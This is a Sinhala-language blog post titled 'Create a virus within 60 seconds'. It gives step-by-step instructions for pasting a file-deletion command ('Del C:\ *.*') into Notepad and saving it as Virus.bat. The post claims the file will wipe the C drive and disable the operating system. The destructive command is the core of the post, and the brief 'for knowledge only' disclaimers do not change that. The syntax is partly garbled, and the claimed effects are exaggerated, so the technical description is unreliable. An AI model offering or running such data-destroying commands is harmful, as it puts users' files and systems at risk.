විනාඩියක් ඇතුලත වෛරස් එකක් හදමු / Create a virus within 60 seconds



ආයුබෝවන් යාළුවනේ!


අද කියලා දෙන්න යන්නේ ඉතාමත් සුළු කාලයක් තුල කොහොමද වෛරස් එකක් හදාගන්නෙ කියලා. අද වන විට සියළුම දෙනාම කටයුතු කරන්නේ පරිගණක සමගයි. එබැවින් සියළු දෙනාම මේ වෛරස් කියන එක දන්නවා. වෛරස් කියලා කියන්නේ ඉතාමත් නරක වැඩසටහනක් වන අතර ඒ මගින් අපගේ පරිගණකයෙහි ඇති දත්ත වලට මෙන්ම මෙහෙයුම් පද්ධතියේ ක්‍රියාකාරිත්වයට බාධා පමුණුවන අතර ඒවා අපගේ අවසරයකින් තොරරව ඒවා අපගේ පරිගණකය තුලට ඇතුළු වේ. වෛරස් කියන ඒවා විවිධාකාරයි. අපි කවදාවත් හිතන් නෑනේ වෛරස් හදන්න. නමුත් එය ඉතාමත් පහසුයි. අපි මේ කතා කරන්නේ ඉතාමත් පහසුවෙන් සාදාගත හැකි වෛරස් එකකි.


බොහෝ දෙදනෙක් හිතන්නේ මේ වෛරස් හදන්න කොඩින් වලින් කියලා. නමුත් අපිට කොඩින් නොමැතිව ඉතාමත් පහසුවෙන් වෛරස් එකක් පිළියෙල කරගත හැකියි. එයට වචන 5-6 හොදටම ඇති. ඒ මගින් අපේ හාඩ් එකේ සී ඩ්‍රයිව් එක (C Drive of Hard disk) සමිපූර්ණයෙන් විනාශ කිරීමට සමත් වේ. අපි මේ කතා කරන වෛරස් එක හදන්නේ Notepad වලයි. මෙය ස්වයංක්‍රියව ක්‍රියාත්මක වේ. එය අපේ මෙහෙයුම් පද්ධතියම අඩපණ කරනු ලබයි. ඒ සදහන් පහත පියවර අනුගමනය කරන්න.


සැලකිය යුතුයි :-

මෙය හුදෙක්ම දැනුම සදහා පමණක් වන අතර එය වැරදි ආකාරයෙන් යොදා ගැනීමෙන් වළකින්න. මෙය අත්හදා බැලීමෙන්ද වළකින්න. එමගින් ඔබගේ පරිගණකයට හානි සිදුවිය හැකිය. ඔබගේ පරිගණකයට නැවත මෙහෙයුම් පද්ධතිය ස්ථාපනය කිරීමට සිදු වේ.


  • පළමුව Notepad එක Open කරගන්න.

  • දැන් මේ පහත ඇති එක Copy කරලා Notepad එක තුල Paste කරන්න

@Echo off
Del C:\ *.* |y

  • දැන් මේ  ෆයිල් එක .bat File එකක් විදිහට Save කරන්න. උදාහරණයක් විදිහට Virus.bat ලෙස Save කරන්න

  • දැන් එම ෆයිල් එක රන් වීමක් සිදුවන අතර එමගින් ඔබගේ මුළු C එකම විනාශ කරනු ලබන අතර මෙහෙයුම් පද්ධතියටද හානි වීමක් සිදුවන අතර නැවත මෙහෙයුම් පද්ධතිය ස්ථාපනය කිරීමට සිදු වේ. 



සැලකිය යුතුයි :-

මෙය හුදෙක්ම දැනුම සදහා පමණක් වන අතර එය වැරදි ආකාරයෙන් යොදා ගැනීමෙන් වළකින්න. මෙය අත්හදා බැලීමෙන්ද වළකින්න. එමගින් ඔබගේ පරිගණකයට හානි සිදුවිය හැකිය. ඔබගේ පරිගණකයට නැවත මෙහෙයුම් පද්ධතිය ස්ථාපනය කිරීමට සිදු වේ.


දැන් ඔබ දන්නවා කොහොමද වෛරස් එකක් ඉක්මනින් හදා ගන්නේ කියලා. තවත් මේ වගේ ලිපියකින් හමුවෙමු. සතුටින් ඉන්න.

SHARE

Nena Mansala

  • Image
  • Image
  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment